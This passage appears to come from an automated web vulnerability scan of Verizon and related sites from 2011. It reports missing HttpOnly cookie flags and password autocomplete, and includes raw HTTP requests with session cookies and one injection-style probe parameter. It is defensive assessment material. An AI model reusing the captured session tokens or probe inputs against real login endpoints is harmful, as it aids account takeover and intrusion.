Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; CMS_TimeZoneOffset=300; CP=null*; refURL=http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm; RecentlyVisited=Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; 
DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html
Expires: Mon, 05 Sep 2011 22:24:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:24:19 GMT
Content-Length: 909
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:29:19 GMT; path=/vztracker/; domain=verizon.com


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>vzTracker</title>
       <meta content="Microsoft Visual Studio 7.0" name="GENERATOR">
       <meta content="C#" na
...[SNIP]...

10.151. http://www35.vzw.com/HG

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www35.vzw.com
Path:   /HG

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HG?hc=&hb=DM570203L6VD%3BDM5612035ADD%3BDM5701316PRA&cd=1&hv=6&n=/personal&con=&vcon=/recipeb/vzw/home+page&tt=auto&ja=y&dt=22&zo=300&lm=1315278870000&bn=Netscape&ce=y&ss=1920*1200&sc=16&sv=16&cy=u&hp=u&ln=en-US&vpc=HBX0200u&vjs=HBX0201.03u&hec=0&pec=&cmp=&gp=&dcmp=&dcmpe=&dcmpre=&cp=null&fnl=&seg=&epg=&cv=&gn=&ld=&la=&c1=&c2=&c3=&c4=&customerid=&ttt=lid,lpos&ra=&pu=&cv.c34=tWRJzfV2FzyamDVoURNGmO7smtgitROzrsjFa48jF8jyYMlJxx5Bllp8fvpJxcQO4&rf=aaaa%3Dbbbb%22%3Ess%26ccc%3Ddddd%2611111%3D22222&pl=Mozilla%20Default%20Plug-in%3AGoogle%20Update%3AiTunes%20Application%20Detector%3AGoogle%20Earth%20Plugin%3AJava%28TM%29%20Platform%20SE%206%20U26%3AJava%20Deployment%20Toolkit%206.0.260.3%3ASilverlight%20Plug-In%3AMicrosoft%20Office%202010%3AMicrosoft%20Office%202010%3AWPI%20Detector%201.4%3AGoogle%20Updater%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3A&lv.id=&lv.pos=&hid=0.001893016047052276 HTTP/1.1
Host: www35.vzw.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
Cookie: V1Z2=3Xxb5cGQpT1L4o_oOLroIebqfANPB4UFu_z48jlyljwyA3Qbv3rwiCA

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:14:57 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM570203L6VDV6=V1rrrrr"rz%X%QBeri^@Brrr@rz%zrzr"%X%QBeri^@z%X%QBeri^@"%X%QBeri^@"%X%QBeri^@Brrr@r"rz(xB$hac2GauxB$qUkxB$O:maxBrGIWaxB$GahF:TI~z7}z)OuKr6XXzA6hac2Gau6qUk6O:maHGIWa6GahF:TI~zIIIIxX[uuuuxBBxX(FFxBecccxX[____xBe%%%%%xX[BBBBB; path=/; domain=www35.vzw.com; expires=Tue, 04-Sep-2012 22:14:57 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%X%QBeri^@; path=/; domain=www35.vzw.com; expires=Tue, 04-Sep-2012 22:14:57 GMT; max-age=31536000
Set-Cookie: DM5612035ADDV6=V1rrrrr"rz%X%QBeri^@Brrr@%z%zrzr"%X%QBeri^@z%X%QBeri^@"%X%QBeri^@"%X%QBeri^@Brrr@%"rz(xB$hac2GauxB$qUkxB$O:maxBrGIWaxB$GahF:TI~z7}z)O:ma6r"OuKr6^QzA6hac2Gau6qUk6O:maHGIWa6GahF:TI~zIIIIxX[uuuuxBBxX(FFxBecccxX[____xBe%%%%%xX[BBBBB; path=/; domain=www35.vzw.com; expires=Tue, 04-Sep-2012 22:14:57 GMT; max-age=31536000
Set-Cookie: CTG=1315260897; path=/; domain=www35.vzw.com; expires=Mon, 12-Sep-2011 22:14:57 GMT; max-age=604800
Set-Cookie: DM5701316PRAV6=V1rrrrr"rz%X%QBeri^@Brrr@%z%zrzr"%X%QBeri^@z%X%QBeri^@"%X%QBeri^@"%X%QBeri^@Brrr@%"rz(xB$hac2GauxB$qUkxB$O:maxBrGIWaxB$GahF:TI~z7}z)OuKr6^QzA6hac2Gau6qUk6O:maHGIWa6GahF:TI~zIIIIxX[uuuuxBBxX(FFxBecccxX[____xBe%%%%%xX[BBBBB; path=/; domain=www35.vzw.com; expires=Tue, 04-Sep-2012 22:14:57 GMT; max-age=31536000
Cneonction: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Mon, 05 Sep 2011 22:14:58 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

10.152. http://www35.vzw.com/HGct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www35.vzw.com
Path:   /HGct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HGct?hc=&hb=DM570203L6VD%3BDM5612035ADD%3BDM5701316PRA&cd=1&hv=6&n=/personal&con=&vcon=/recipeb/vzw/home+page&tt=auto&ja=y&dt=22&zo=300&lm=1315278870000&bn=Netscape&ce=y&ss=1920*1200&sc=16&sv=16&cy=u&hp=u&ln=en-US&vpc=HBX0200u&vjs=HBX0201.03u&hec=2&lid=//hp//p//100+Trade+In//Imp&hid=0.8519863505392464 HTTP/1.1
Host: www35.vzw.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
Cookie: V1Z2=3Xxb5cGQpT1L4o_oOLroIebqfANPB4UFu_z48jlyljwyA3Qbv3rwiCA; CTG=1315260897

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:15:01 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM570203L6VDV6=V1rrrrr"rz%X%QBer^rr%QrBBCz%zrz%"%X%QBer^rrz%X%QBer^rr"%X%QBer^r%"%X%QBer^rr%QrBBC"%z(xB$hac2GauxB$qUkxB$O:maxBrGIWaxB$GahF:TI~z7}z)OuKr6Q%zA6hac2Gau6qUk6O:maHGIWa6GahF:TI~; path=/; domain=www35.vzw.com; expires=Tue, 04-Sep-2012 22:15:01 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%X%QBer^rr; path=/; domain=www35.vzw.com; expires=Tue, 04-Sep-2012 22:15:01 GMT; max-age=31536000
Set-Cookie: DM5612035ADDV6=V1rrrrr"rz%X%QBer^rr%QrBBQz%zrz%"%X%QBer^rrz%X%QBer^rr"%X%QBer^r%"%X%QBer^rr%QrBBQ"%z(xB$hac2GauxB$qUkxB$O:maxBrGIWaxB$GahF:TI~z7}z)O:ma6r"OuKr6%r^zA6hac2Gau6qUk6O:maHGIWa6GahF:TI~; path=/; domain=www35.vzw.com; expires=Tue, 04-Sep-2012 22:15:01 GMT; max-age=31536000
Set-Cookie: CTG=1315260901; path=/; domain=www35.vzw.com; expires=Mon, 12-Sep-2011 22:15:01 GMT; max-age=604800
Set-Cookie: DM5701316PRAV6=V1rrrrr"rz%X%QBer^rr%QrBBQz%zrz%"%X%QBer^rrz%X%QBer^rr"%X%QBer^r%"%X%QBer^rr%QrBBQ"%z(xB$hac2GauxB$qUkxB$O:maxBrGIWaxB$GahF:TI~z7}z)OuKr6%r^zA6hac2Gau6qUk6O:maHGIWa6GahF:TI~; path=/; domain=www35.vzw.com; expires=Tue, 04-Sep-2012 22:15:01 GMT; max-age=31536000
nnCoection: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Mon, 05 Sep 2011 22:15:02 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

11. Password field with autocomplete enabled
There are 18 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


11.1. http://b2b.vzw.com/industrysolutions/index.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://b2b.vzw.com
Path:   /industrysolutions/index.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /industrysolutions/index.html HTTP/1.1
Host: b2b.vzw.com
Proxy-Connection: keep-alive
Referer: http://cache.vzw.com/images_b2c/homepage/biz_marquee_verticals.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V1Z2=0; mp__utma=48181944.1605757161.1315237028.1315237028.1315237028.1; mp__utmz=48181944.1315237028.1.2.utmccn=(referral)|utmcsr=wireless.amazon.com|utmcct=/help/200307920/ref=bp_hp_br|utmcmd=referral; mbox=session#1315237011507-275926#1315239441|PC#1315237011507-275926.17#1316447181|check#true#1315237641

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.3.3
Content-Type: text/html
X-Cacheable: NO: !obj.cacheable
Content-Length: 20859
Date: Mon, 05 Sep 2011 21:56:40 GMT
X-Varnish: 1491768482
Age: 0
Via: 1.1 varnish
Connection: keep-alive



...[SNIP]...
<div class="login_content">
<form name="myaccountForm" id="myaccountForm" method="post" action="https://mblogin.verizonwireless.com/amserver/UI/Login?realm=vzwmb">
<input type="hidden" name="rememberUserNameCheckBoxExists" value="Y" />
...[SNIP]...
</label>
<input type="password" name="IDToken2" id="IDToken2" maxlength="60" />
<div class="fixer_10">
...[SNIP]...

11.2. https://dashboard.opinionlab.com/pv_controlboard.html

Summary

Severity:   Low
Confidence:   Certain
Host:   https://dashboard.opinionlab.com
Path:   /pv_controlboard.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /pv_controlboard.html HTTP/1.1
Host: dashboard.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:34:47 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/1.0.0 DAV/2 mod_python/3.3.1 Python/2.6
X-Server-Name: dash-apachevm02
Connection: close
Content-Type: text/html
Set-Cookie: NSC_Qvcmjd-Ebticpbse=ffffffff0912667945525d5f4f58455e445a4a423660;expires=Mon, 05-Sep-2011 22:49:47 GMT;path=/;secure;httponly
Content-Length: 16994

<html xmlns:date="http://exslt.org/dates-and-times">
<head>
<title>OpinionLab, Inc. | Dashboard V1.2</title>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type">
<meta content="" name="
...[SNIP]...
<body onload="document.loginform.subscriber_id.focus()"><form method="get" name="loginform" action="/login/dashboard.html">
<input type="hidden" name="sess_id" value="94efa68611582c29a8943120d206cf56">
...[SNIP]...
<td><input class="inputURL" name="password" type="password" style="width: 150px"></td>
...[SNIP]...

11.3. https://enterprisecenter.verizon.com/enterprisesolutions/default/CC/signIn.do

Summary

Severity:   Low
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/default/CC/signIn.do

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /enterprisesolutions/default/CC/signIn.do HTTP/1.1
Host: enterprisecenter.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
Expires: Mon, 05 Sep 2011 22:35:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:35:21 GMT
Content-Length: 21910
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
...[SNIP]...
<div id = "siginInPod" class="boxContent fixedBoxHeightAnon">                
                   <form onsubmit="return validform()" name="SignInForm" id="SignInForm" action="https://EnterpriseCenter.verizon.com/enterprisesolutions/Default/login.fcc" method="POST" onload="begin()" target="_top">
                           
                                   <strong>
...[SNIP]...
<br />
                                   <input type="password" name="PASSWORD" id="PASSWORD" size="22" style="width:150px" onkeypress="javascript:EnterKeySubmit(event);"/>
                                   <br>
...[SNIP]...

11.4. https://enterprisecenter.verizon.com/enterprisesolutions/default/signIn.do

Summary

Severity:   Low
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/default/signIn.do

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /enterprisesolutions/default/signIn.do?TYPE=33554433&REALMOID=06-3bc2b407-708d-100e-b8d8-80e9104e0217&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=yEpKvw2seAPol78XasYtX0XQ0z1SO8yMK6CDIkxTGYk63aSlmsHTzcEjfuEFE05q&TARGET=$SM$HTTPS%3a%2f%2fenterprisecenter%2everizon%2ecom%2fenterprisesolutions%2fglobal%2fgHome%2edo HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Expires: Mon, 05 Sep 2011 22:25:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:25:37 GMT
Content-Length: 21907
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
...[SNIP]...
<div id = "siginInPod" class="boxContent fixedBoxHeightAnon">                
                   <form onsubmit="return validform()" name="SignInForm" id="SignInForm" action="https://EnterpriseCenter.verizon.com/enterprisesolutions/Default/login.fcc" method="POST" onload="begin()" target="_top">
                           
                                   <strong>
...[SNIP]...
<br />
                                   <input type="password" name="PASSWORD" id="PASSWORD" size="22" style="width:150px" onkeypress="javascript:EnterKeySubmit(event);"/>
                                   <br>
...[SNIP]...

11.5. https://signin.verizon.com/sso/RetrieveUserID

Summary

Severity:   Low
Confidence:   Certain
Host:   https://signin.verizon.com
Path:   /sso/RetrieveUserID

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

POST /sso/RetrieveUserID?goFlow=forgotUserID HTTP/1.1
Host: signin.verizon.com
Connection: keep-alive
Referer: https://signin.verizon.com/sso/ForgotUserIDPassword
Content-Length: 160
Cache-Control: max-age=0
Origin: https://signin.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; VZSSOCOM_SESSIONID=3G0bTlLf1jTwG4vn19Q6hKvqw4QjypJ4qhDWfmfDPR62TbVp8RjL!419329926!559599265; CP=null*; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

VZHeader1%3AHdnPageName=forgot%2Buser%2Bid%2Bor%2Bpassword&VZHeader1%3AHdnPageUrl=%2Fvz%2Fresidential%2Fmyverizon2%2Fregistration%2Flogin%2Bhelp&choice=forgotID

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:23:21 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/p3p/w3c/p3p.xml", CP="CAO DSP COR CUR ADM TAI PSD IVAi IVDi OTPi OTRi STP PHY ONL UNI"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 72575


<!-- Instance name: comsso3a -->

<html>

<head>

<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="0">

<meta
...[SNIP]...
</table>
<form name="forgotUserID" action="/sso/RetrieveUserID?action=processFlow" method="post" onsubmit="return validate();">
<input name="VZHeader1:HdnPageName" id="VZHeader1_HdnPageName" type="hidden" value="step+1+account+information"/>
...[SNIP]...
<td style="padding-left: 15px;"><INPUT type="password" name="vzPwd" size="20" maxlength="24"></td>
...[SNIP]...
<td style="padding-left: 30px;"><INPUT type="password" name="vzPwd1" size="20" maxlength="24"></td>
...[SNIP]...

11.6. http://webmail.verizon.com/signin/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://webmail.verizon.com
Path:   /signin/

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /signin/ HTTP/1.1
Host: webmail.verizon.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BusinessUnit=business; vsrecentsearches=wss~xss~xss%20sq~~; BTagRequired=N

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: webmail_ad="ad=2"; Version=1; Max-Age=86400; Expires=Tue, 06-Sep-2011 22:18:35 GMT; Path=/
Set-Cookie: lob=webmail; Domain=.verizon.com; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 05 Sep 2011 22:18:35 GMT
Content-Length: 17185


<html>
<head>
   <title>Verizon | My Verizon 2.0 | Webmail</title>
   

   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta HT
...[SNIP]...
<div style="vertical-align: top; padding: 0px; margin: 0px;width: 372px; height: 535px; background-image: url('images/signin_bkgd3.jpg')">
               <form name="frmLogin" id="frmLogin" method="post" action="https://auth.verizon.com/amserver/UI/Login?realm=dotcom&module=AIAW&clientId=webmail&goto=http://webmail.verizon.com/signin/LdapBind.jsp">
               <input name="VZHeader1:HdnPageName" id="VZHeader1_HdnPageName" type="hidden" value="container"/>
...[SNIP]...
<td valign="top">
                                       
                                       <input name="IDToken2" type="password" class="text" id="IDToken2" accesskey="p" tabindex="2" size="25" />
                                       
                                   </td>
...[SNIP]...

11.7. http://webmail.verizon.net/signin/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://webmail.verizon.net
Path:   /signin/

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /signin/ HTTP/1.1
Host: webmail.verizon.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: webmail_ad="ad=2"; Version=1; Max-Age=86400; Expires=Tue, 06-Sep-2011 22:19:04 GMT; Path=/
Set-Cookie: lob=webmail; Domain=.verizon.net; Path=/
Content-Type: text/html
Vary: Accept-Encoding
Date: Mon, 05 Sep 2011 22:19:03 GMT
Content-Length: 19268


<html>
<head>
   <title>Welcome to Verizon Webmail</title>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta NAME="DCS.dcsid" CONTEN
...[SNIP]...
<div style="vertical-align: top; padding: 0px; margin: 0px;width: 372px; height: 499px; background-image: url('images/signin_bkgd.jpg')">
           <form name="frmLogin" id="frmLogin" method="post" action="https://auth.verizon.net/amserver/UI/Login?realm=dotnet&module=LDAP&clientId=webmail&goto=http://webmail.verizon.net/signin/LdapBind.jsp">
               <table width="322" border="0" cellpadding="0">
...[SNIP]...
<td valign="top">
                                       
                                       <input name="IDToken2" type="password" class="text" id="IDToken2" accesskey="p" tabindex="2" size="25" />
                                       
                                   </td>
...[SNIP]...

11.8. http://webmail.verizon.net/signin/Login.jsp

Summary

Severity:   Low
Confidence:   Certain
Host:   http://webmail.verizon.net
Path:   /signin/Login.jsp

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /signin/Login.jsp?src=SAM&err=1011 HTTP/1.1
Host: webmail.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/
Cache-Control: max-age=0
